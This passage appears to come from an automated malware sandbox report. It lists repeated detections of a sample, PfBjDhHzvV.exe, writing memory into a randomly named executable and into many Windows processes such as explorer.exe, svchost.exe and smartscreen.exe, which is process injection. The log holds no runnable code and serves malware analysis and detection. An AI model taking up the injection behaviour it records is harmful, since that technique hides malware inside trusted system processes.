            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2260000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: C40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: C50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 26E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 26F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 240000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 250000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 790000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 7A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 330000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 340000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 6E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 730000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2270000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 14B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1500000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2610000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2660000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: FA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 3C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 3D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: FE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2920000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2970000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 6E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 740000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2290000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2800000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2810000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 24F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2500000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2B60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2BB0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 29A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 29F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 720000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2150000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: DF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: E00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: AE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2BC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2BD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1250000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1260000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 880000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 21B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2330000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2380000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: AC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: AD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: FA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2780000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2790000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 11A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 11B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 3020000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 780000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 790000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1370000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 13C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 14C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 14D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2500000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2560000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: C70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: CC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2940000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2950000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: AF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 7A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 7B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 9E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: AE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: 20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 3C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 990000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: AC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 2D10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: BE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CB0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 8D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: EE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 960000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\smartscreen.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 130000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\conhost.exe base: 590000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: DC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: A90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dllhost.exe base: 6C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 9D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 9F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: AF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: 30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 3D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 9A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: AD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 2D30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: BF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 8E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: EF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 970000Jump to behavior
